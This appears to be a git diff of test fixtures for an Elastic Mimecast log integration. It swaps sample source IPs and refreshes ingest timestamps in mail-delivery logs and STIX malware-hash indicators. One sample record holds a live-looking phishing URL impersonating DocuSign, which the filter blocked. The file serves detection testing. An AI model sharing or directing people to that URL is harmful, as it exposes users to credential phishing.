filename=\"delivery_20211018093329655.json\""} +{"acc":"ABC123","Delivered":false,"IP":"67.43.156.15","RejType":"Recipient email address is possibly incorrect","RejCode":"550","AttCnt":0,"Dir":"Inbound","ReceiptAck":null,"MsgId":null,"Subject":null,"Latency":505,"Sender":"<>","datetime":"2021-10-19T07:06:40+0100","Rcpt":"johndoe@example.com","AttSize":0,"Attempt":1,"RejInfo":"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]","TlsVer":"TLSv1.2","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","Snt":125,"aCode":"29be076e-44cd-354d-a7c2-083d4a312371","UseTls":"Yes","Route":"Office365","Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""} {"acc":"ABC123","Sender":"postmaster@twotoeight.com","datetime":"2021-10-19T07:04:55+0100","AttSize":0,"Content-Disposition":"attachment; filename=\"process_20211018093329655.json\"","Act":"Acc","aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","AttCnt":0,"AttNames":null,"MsgSize":49025,"MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":"You have new held messages"} -{"acc":"ABC123","Delivered":true,"IP":"8.8.8.8","AttCnt":0,"Dir":"Internal","ReceiptAck":"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]","MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":null,"Latency":1090,"Sender":"johndoe@example.com","datetime":"2021-10-19T07:04:55+0100","Rcpt":"johndoejr@example.com","AttSize":0,"Attempt":1,"Snt":51666,"aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","UseTls":"No", "Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""},{"acc":"ABC123","Delivered":false,"IP":"8.8.8.8","RejType":"Recipient email address is possibly incorrect","RejCode":"550","AttCnt":0,"Dir":"Internal","ReceiptAck":null,"MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":"You have new held messages","Latency":1534,"Sender":"johndoe@example.com","datetime":"2021-10-19T07:04:56+0100","Rcpt":"johndoejr@example.com","AttSize":0,"Attempt":1,"RejInfo":"5.4.1 Recipient address rejected: Access denied. AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]","TlsVer":"TLSv1.2","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","Snt":147,"aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","UseTls":"Yes","Route":"Office365","Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""} +{"acc":"ABC123","Delivered":true,"IP":"67.43.156.15","AttCnt":0,"Dir":"Internal","ReceiptAck":"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]","MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":null,"Latency":1090,"Sender":"johndoe@example.com","datetime":"2021-10-19T07:04:55+0100","Rcpt":"johndoejr@example.com","AttSize":0,"Attempt":1,"Snt":51666,"aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","UseTls":"No", "Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""},{"acc":"ABC123","Delivered":false,"IP":"67.43.156.15","RejType":"Recipient email address is possibly incorrect","RejCode":"550","AttCnt":0,"Dir":"Internal","ReceiptAck":null,"MsgId":"<137188507-1634623494888@uk-mta-151.uk.mimecast.lan>","Subject":"You have new held messages","Latency":1534,"Sender":"johndoe@example.com","datetime":"2021-10-19T07:04:56+0100","Rcpt":"johndoejr@example.com","AttSize":0,"Attempt":1,"RejInfo":"5.4.1 Recipient address rejected: Access denied. AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]","TlsVer":"TLSv1.2","Cphr":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","Snt":147,"aCode":"61dfe7da-4c6d-34e1-9667-69b04f0d564f","UseTls":"Yes","Route":"Office365","Content-Disposition":"attachment; filename=\"delivery_20211018093329655.json\""} {"acc":"C46A75","Sender":"johndoe@example.com","datetime":"2021-11-08T12:09:18+0000","Rcpt":"o365_service_account@example.com","RcptActType":"Jnl","aCode":"CYSuuaBUMjOpk3k1Xhvy_Q","Dir":"Internal","RcptHdrType":"Unknown", "Content-Disposition":"attachment; filename=\"jrnl_20211018093329655.json\""} -{"acc":"C46A75","Sender":"johndoe@example.com","datetime":"2021-11-08T12:10:19+0000","Rcpt":"johndoejr@example.com","Act":"Acc","IP":"8.8.8.8","aCode":"3dbe9918-f91f-3043-b61f-d3164badfe50","Dir":"Internal","Subject":"You have new held messages","MsgId":"<140943948-1636373419265@uk-mta-286.uk.mimecast.lan>","headerFrom":"johndoe@example.com", "Content-Disposition":"attachment; filename=\"receipt_20211018093329655.json\""} -{"acc":"C46A75","reason":"malicious","subject":"DocuSign- Contract #45576744333","msgid":null,"url":"http:\/\/docusign.swrodgods.x10.mx\/Docun\/Docu\/index2.php","datetime":"2021-11-29T15:13:58+0000","route":"inbound","sourceIp":"52.100.141.34","sender":"docusign-services@zenz.us","recipient":"aorchard@twotoeight.com","action":"Block","urlCategory":"Phishing & Fraud","credentialTheft":null,"senderDomain":"zenz.us", "Content-Disposition":"attachment; filename=\"ttp_url_20211129153015541.json\""} \ No newline at end of file +{"acc":"C46A75","Sender":"johndoe@example.com","datetime":"2021-11-08T12:10:19+0000","Rcpt":"johndoejr@example.com","Act":"Acc","IP":"81.2.69.193","aCode":"3dbe9918-f91f-3043-b61f-d3164badfe50","Dir":"Internal","Subject":"You have new held messages","MsgId":"<140943948-1636373419265@uk-mta-286.uk.mimecast.lan>","headerFrom":"johndoe@example.com", "Content-Disposition":"attachment; filename=\"receipt_20211018093329655.json\""} +{"acc":"C46A75","reason":"malicious","subject":"DocuSign- Contract #45576744333","msgid":null,"url":"http:\/\/docusign.swrodgods.x10.mx\/Docun\/Docu\/index2.php","datetime":"2021-11-29T15:13:58+0000","route":"inbound","sourceIp":"81.2.69.193","sender":"docusign-services@zenz.us","recipient":"aorchard@twotoeight.com","action":"Block","urlCategory":"Phishing & Fraud","credentialTheft":null,"senderDomain":"zenz.us", "Content-Disposition":"attachment; filename=\"ttp_url_20211129153015541.json\""} diff --git a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json index 76d02755dee..3b0e08ffe44 100644 --- a/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json +++ b/packages/mimecast/data_stream/siem_logs/_dev/test/pipeline/test-siem-logs.log-expected.json @@ -8,7 +8,7 @@ "event": { "reason": "Spm", "action": "Hld", - "ingested": "2021-12-06T21:18:44.898227900Z", + "ingested": "2021-12-09T15:16:05.665545500Z", "original": "{\"Act\":\"Hld\",\"AttCnt\":0,\"AttNames\":null,\"AttSize\":0,\"Content-Disposition\":\"attachment; filename=\\\"process_20211018093329655.json\\\"\",\"Hld\":\"Spm\",\"MsgId\":\"\\u003cINX.164dae0719be95da77068c7d264.3e915.e7719.c78c.17c926a3231ace@newsletter.77onlineshop.eu\\u003e\",\"MsgSize\":157436,\"Sender\":\"bounce_9244+cdaahhimyaaaaagaad5ekqaaaaaaaaeribenpq@newsletter.77onlineshop.eu\",\"Subject\":\"Hi Sandra! Neue Styles eingetroffen! – Finde deinen Lieblings-Look!\",\"aCode\":\"HhuwRf_AOcuJZINE2ZgcKw\",\"acc\":\"ABC123\",\"datetime\":\"2021-10-18T09:02:43+0100\"}", "created": "2021-10-18T09:02:43+0100", "outcome": "unknown" @@ -41,7 +41,7 @@ "name": "Office365" }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "error": { "type": "Recipient email address is possibly incorrect", @@ -61,8 +61,8 @@ }, "event": { "reason": "5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]", - "ingested": "2021-12-06T21:18:44.898231300Z", - "original": "{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"8.8.8.8\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Inbound\",\"ReceiptAck\":null,\"MsgId\":null,\"Subject\":null,\"Latency\":505,\"Sender\":\"\u003c\u003e\",\"datetime\":\"2021-10-19T07:06:40+0100\",\"Rcpt\":\"johndoe@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":125,\"aCode\":\"29be076e-44cd-354d-a7c2-083d4a312371\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", + "ingested": "2021-12-09T15:16:05.665550Z", + "original": "{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"67.43.156.15\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Inbound\",\"ReceiptAck\":null,\"MsgId\":null,\"Subject\":null,\"Latency\":505,\"Sender\":\"\u003c\u003e\",\"datetime\":\"2021-10-19T07:06:40+0100\",\"Rcpt\":\"johndoe@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [LO2GBR01FT037.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":125,\"aCode\":\"29be076e-44cd-354d-a7c2-083d4a312371\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", "created": "2021-10-19T07:06:40+0100", "outcome": "failure" }, @@ -97,7 +97,7 @@ }, "event": { "action": "Acc", - "ingested": "2021-12-06T21:18:44.898232900Z", + "ingested": "2021-12-09T15:16:05.665553900Z", "original": "{\"acc\":\"ABC123\",\"Sender\":\"postmaster@twotoeight.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"AttSize\":0,\"Content-Disposition\":\"attachment; filename=\\\"process_20211018093329655.json\\\"\",\"Act\":\"Acc\",\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"AttCnt\":0,\"AttNames\":null,\"MsgSize\":49025,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\"}", "created": "2021-10-19T07:04:55+0100", "outcome": "unknown" @@ -134,11 +134,11 @@ "established": false }, "source": { - "ip": "8.8.8.8" + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-06T21:18:44.898247800Z", - "original": "{\"acc\":\"ABC123\",\"Delivered\":true,\"IP\":\"8.8.8.8\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":\"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]\",\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":null,\"Latency\":1090,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"Snt\":51666,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"No\", \"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"},{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"8.8.8.8\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":null,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\",\"Latency\":1534,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:56+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":147,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", + "ingested": "2021-12-09T15:16:05.665560600Z", + "original": "{\"acc\":\"ABC123\",\"Delivered\":true,\"IP\":\"67.43.156.15\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":\"250 SmtpInternalThread-19194240-1634623495703@uk-mta-151.uk.mimecast.lan Received OK [61dfe7da-4c6d-34e1-9667-69b04f0d564f.uk151]\",\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":null,\"Latency\":1090,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:55+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"Snt\":51666,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"No\", \"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"},{\"acc\":\"ABC123\",\"Delivered\":false,\"IP\":\"67.43.156.15\",\"RejType\":\"Recipient email address is possibly incorrect\",\"RejCode\":\"550\",\"AttCnt\":0,\"Dir\":\"Internal\",\"ReceiptAck\":null,\"MsgId\":\"\u003c137188507-1634623494888@uk-mta-151.uk.mimecast.lan\u003e\",\"Subject\":\"You have new held messages\",\"Latency\":1534,\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-10-19T07:04:56+0100\",\"Rcpt\":\"johndoejr@example.com\",\"AttSize\":0,\"Attempt\":1,\"RejInfo\":\"5.4.1 Recipient address rejected: Access denied. AS(201806281) [CWLGBR01FT010.eop-gbr01.prod.protection.outlook.com]\",\"TlsVer\":\"TLSv1.2\",\"Cphr\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"Snt\":147,\"aCode\":\"61dfe7da-4c6d-34e1-9667-69b04f0d564f\",\"UseTls\":\"Yes\",\"Route\":\"Office365\",\"Content-Disposition\":\"attachment; filename=\\\"delivery_20211018093329655.json\\\"\"}", "created": "2021-10-19T07:04:55+0100", "outcome": "success" }, @@ -177,7 +177,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-06T21:18:44.898248900Z", + "ingested": "2021-12-09T15:16:05.665567200Z", "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:09:18+0000\",\"Rcpt\":\"o365_service_account@example.com\",\"RcptActType\":\"Jnl\",\"aCode\":\"CYSuuaBUMjOpk3k1Xhvy_Q\",\"Dir\":\"Internal\",\"RcptHdrType\":\"Unknown\", \"Content-Disposition\":\"attachment; filename=\\\"jrnl_20211018093329655.json\\\"\"}", "created": "2021-11-08T12:09:18+0000", "outcome": "unknown" @@ -208,12 +208,12 @@ "version": "1.12.0" }, "source": { - "ip": "8.8.8.8" + "ip": "81.2.69.193" }, "event": { "action": "Acc", - "ingested": "2021-12-06T21:18:44.898250100Z", - "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:10:19+0000\",\"Rcpt\":\"johndoejr@example.com\",\"Act\":\"Acc\",\"IP\":\"8.8.8.8\",\"aCode\":\"3dbe9918-f91f-3043-b61f-d3164badfe50\",\"Dir\":\"Internal\",\"Subject\":\"You have new held messages\",\"MsgId\":\"\u003c140943948-1636373419265@uk-mta-286.uk.mimecast.lan\u003e\",\"headerFrom\":\"johndoe@example.com\", \"Content-Disposition\":\"attachment; filename=\\\"receipt_20211018093329655.json\\\"\"}", + "ingested": "2021-12-09T15:16:05.665573200Z", + "original": "{\"acc\":\"C46A75\",\"Sender\":\"johndoe@example.com\",\"datetime\":\"2021-11-08T12:10:19+0000\",\"Rcpt\":\"johndoejr@example.com\",\"Act\":\"Acc\",\"IP\":\"81.2.69.193\",\"aCode\":\"3dbe9918-f91f-3043-b61f-d3164badfe50\",\"Dir\":\"Internal\",\"Subject\":\"You have new held messages\",\"MsgId\":\"\u003c140943948-1636373419265@uk-mta-286.uk.mimecast.lan\u003e\",\"headerFrom\":\"johndoe@example.com\", \"Content-Disposition\":\"attachment; filename=\\\"receipt_20211018093329655.json\\\"\"}", "created": "2021-11-08T12:10:19+0000", "outcome": "unknown" }, @@ -245,13 +245,13 @@ }, "source": { "domain": "zenz.us", - "ip": "52.100.141.34" + "ip": "81.2.69.193" }, "event": { "reason": "malicious", "action": "Block", - "ingested": "2021-12-06T21:18:44.898251200Z", - "original": "{\"acc\":\"C46A75\",\"reason\":\"malicious\",\"subject\":\"DocuSign- Contract #45576744333\",\"msgid\":null,\"url\":\"http:\\/\\/docusign.swrodgods.x10.mx\\/Docun\\/Docu\\/index2.php\",\"datetime\":\"2021-11-29T15:13:58+0000\",\"route\":\"inbound\",\"sourceIp\":\"52.100.141.34\",\"sender\":\"docusign-services@zenz.us\",\"recipient\":\"aorchard@twotoeight.com\",\"action\":\"Block\",\"urlCategory\":\"Phishing \u0026 Fraud\",\"credentialTheft\":null,\"senderDomain\":\"zenz.us\", \"Content-Disposition\":\"attachment; filename=\\\"ttp_url_20211129153015541.json\\\"\"}", + "ingested": "2021-12-09T15:16:05.665578600Z", + "original": "{\"acc\":\"C46A75\",\"reason\":\"malicious\",\"subject\":\"DocuSign- Contract #45576744333\",\"msgid\":null,\"url\":\"http:\\/\\/docusign.swrodgods.x10.mx\\/Docun\\/Docu\\/index2.php\",\"datetime\":\"2021-11-29T15:13:58+0000\",\"route\":\"inbound\",\"sourceIp\":\"81.2.69.193\",\"sender\":\"docusign-services@zenz.us\",\"recipient\":\"aorchard@twotoeight.com\",\"action\":\"Block\",\"urlCategory\":\"Phishing \u0026 Fraud\",\"credentialTheft\":null,\"senderDomain\":\"zenz.us\", \"Content-Disposition\":\"attachment; filename=\\\"ttp_url_20211129153015541.json\\\"\"}", "created": "2021-11-29T15:13:58+0000", "outcome": "unknown" }, diff --git a/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json b/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json index eff4f98cf01..a878745fd1f 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json +++ b/packages/mimecast/data_stream/threat_intel_malware_customer/_dev/test/pipeline/test-threat-intel-malware-customer.log-expected.json @@ -24,7 +24,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218116Z", + "ingested": "2021-12-09T15:16:06.051075700Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--18c62174-0d31-4653-afe6-d104c57b6b2c\", \"created\": \"2021-10-29T15:07:26.653Z\", \"modified\": \"2021-10-29T15:07:26.653Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'c20d551424f2df6312f7fa700ed97cd199c3d5c8a0f4dfd683627f18913096de']\", \"valid_from\": \"2021-10-29T15:07:26.653Z\" }", "category": "threat", "type": "indicator", @@ -69,7 +69,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218119200Z", + "ingested": "2021-12-09T15:16:06.051095300Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--d70d0fc0-7fbe-4acc-9830-230a97ecdab3\", \"created\": \"2021-10-29T15:07:22.595Z\", \"modified\": \"2021-10-29T15:07:22.595Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '6a6cd489550ddc08871e14dec73f782bf2405378e9f4adeaa61f1574bea4dbbb']\", \"valid_from\": \"2021-10-29T15:07:22.595Z\" }", "category": "threat", "type": "indicator", @@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218122100Z", + "ingested": "2021-12-09T15:16:06.051110900Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--571f0b0a-7206-4a1f-9c5d-9c04e46e0976\", \"created\": \"2021-10-29T15:07:17.538Z\", \"modified\": \"2021-10-29T15:07:17.538Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '8042d56337b7e7be79688ca861b3c4ba928f95b0824f598ca79e63882dea0668']\", \"valid_from\": \"2021-10-29T15:07:17.538Z\" }", "category": "threat", "type": "indicator", @@ -159,7 +159,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218124900Z", + "ingested": "2021-12-09T15:16:06.051126200Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--90b29bf9-ea1a-423b-8542-4c4590f4038c\", \"created\": \"2021-10-29T15:07:14.044Z\", \"modified\": \"2021-10-29T15:07:14.044Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'df086e1fe742f0992ecd2aec8a3a4b5be6023cca5ef8caf1da3d5b67e9359047']\", \"valid_from\": \"2021-10-29T15:07:14.044Z\" }", "category": "threat", "type": "indicator", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218128Z", + "ingested": "2021-12-09T15:16:06.051142400Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--a84c0ac6-f99e-4d1e-b552-74e9023d1505\", \"created\": \"2021-10-29T15:07:07.295Z\", \"modified\": \"2021-10-29T15:07:07.295Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '5dbdcba2a373949359459e0e94954896bc06565d745dd36ee2b013dee1dcc283']\", \"valid_from\": \"2021-10-29T15:07:07.295Z\" }", "category": "threat", "type": "indicator", @@ -249,7 +249,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218130900Z", + "ingested": "2021-12-09T15:16:06.051158200Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--1fe76455-3ec3-4319-a34c-e4e8e8236ec0\", \"created\": \"2021-10-29T15:07:00.555Z\", \"modified\": \"2021-10-29T15:07:00.555Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'bcb910f6ab3144c97ca15845741c94479a8925f545ddf59e74253f50d862d10c']\", \"valid_from\": \"2021-10-29T15:07:00.555Z\" }", "category": "threat", "type": "indicator", @@ -294,7 +294,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:12.218133800Z", + "ingested": "2021-12-09T15:16:06.051176100Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_customer_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--3816deef-ba8f-40c4-ba11-a862b4322b11\", \"created\": \"2021-10-29T15:07:00.259Z\", \"modified\": \"2021-10-29T15:07:00.259Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'e87c5de5f07b36806521334cd25e756b66aa8376d2d52faf269b1878c62cf3dd']\", \"valid_from\": \"2021-10-29T15:07:00.259Z\" }", "category": "threat", "type": "indicator", diff --git a/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json b/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json index 4197cdfe2b7..7123ee94e96 100644 --- a/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json +++ b/packages/mimecast/data_stream/threat_intel_malware_grid/_dev/test/pipeline/test-threat-intel-malware-grid.log-expected.json @@ -24,7 +24,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427883400Z", + "ingested": "2021-12-09T15:16:06.632077Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--18c62174-0d31-4653-afe6-d104c57b6b2c\", \"created\": \"2021-10-29T15:07:26.653Z\", \"modified\": \"2021-10-29T15:07:26.653Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'c20d551424f2df6312f7fa700ed97cd199c3d5c8a0f4dfd683627f18913096de']\", \"valid_from\": \"2021-10-29T15:07:26.653Z\" }", "category": "threat", "type": "indicator", @@ -69,7 +69,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427886400Z", + "ingested": "2021-12-09T15:16:06.632093200Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--d70d0fc0-7fbe-4acc-9830-230a97ecdab3\", \"created\": \"2021-10-29T15:07:22.595Z\", \"modified\": \"2021-10-29T15:07:22.595Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '6a6cd489550ddc08871e14dec73f782bf2405378e9f4adeaa61f1574bea4dbbb']\", \"valid_from\": \"2021-10-29T15:07:22.595Z\" }", "category": "threat", "type": "indicator", @@ -114,7 +114,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427889200Z", + "ingested": "2021-12-09T15:16:06.632108200Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--571f0b0a-7206-4a1f-9c5d-9c04e46e0976\", \"created\": \"2021-10-29T15:07:17.538Z\", \"modified\": \"2021-10-29T15:07:17.538Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '8042d56337b7e7be79688ca861b3c4ba928f95b0824f598ca79e63882dea0668']\", \"valid_from\": \"2021-10-29T15:07:17.538Z\" }", "category": "threat", "type": "indicator", @@ -159,7 +159,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427892100Z", + "ingested": "2021-12-09T15:16:06.632122500Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--90b29bf9-ea1a-423b-8542-4c4590f4038c\", \"created\": \"2021-10-29T15:07:14.044Z\", \"modified\": \"2021-10-29T15:07:14.044Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'df086e1fe742f0992ecd2aec8a3a4b5be6023cca5ef8caf1da3d5b67e9359047']\", \"valid_from\": \"2021-10-29T15:07:14.044Z\" }", "category": "threat", "type": "indicator", @@ -204,7 +204,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427895300Z", + "ingested": "2021-12-09T15:16:06.632141Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--a84c0ac6-f99e-4d1e-b552-74e9023d1505\", \"created\": \"2021-10-29T15:07:07.295Z\", \"modified\": \"2021-10-29T15:07:07.295Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = '5dbdcba2a373949359459e0e94954896bc06565d745dd36ee2b013dee1dcc283']\", \"valid_from\": \"2021-10-29T15:07:07.295Z\" }", "category": "threat", "type": "indicator", @@ -249,7 +249,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427898300Z", + "ingested": "2021-12-09T15:16:06.632158800Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--1fe76455-3ec3-4319-a34c-e4e8e8236ec0\", \"created\": \"2021-10-29T15:07:00.555Z\", \"modified\": \"2021-10-29T15:07:00.555Z\", \"labels\": [ \"malicious-activity\" ], \"pattern\": \"[file:hashes.'SHA-256' = 'bcb910f6ab3144c97ca15845741c94479a8925f545ddf59e74253f50d862d10c']\", \"valid_from\": \"2021-10-29T15:07:00.555Z\" }", "category": "threat", "type": "indicator", @@ -294,7 +294,7 @@ } }, "event": { - "ingested": "2021-11-25T11:34:13.427901100Z", + "ingested": "2021-12-09T15:16:06.632176600Z", "original": "{ \"Content-Disposition\":\"attachment; filename=\\\"malware_grid_stix_20211028161801144.stix\\\"\",\"type\": \"indicator\", \"id\": \"indicator--3816deef-ba8f-40c4-ba11-a862b4322b11\", 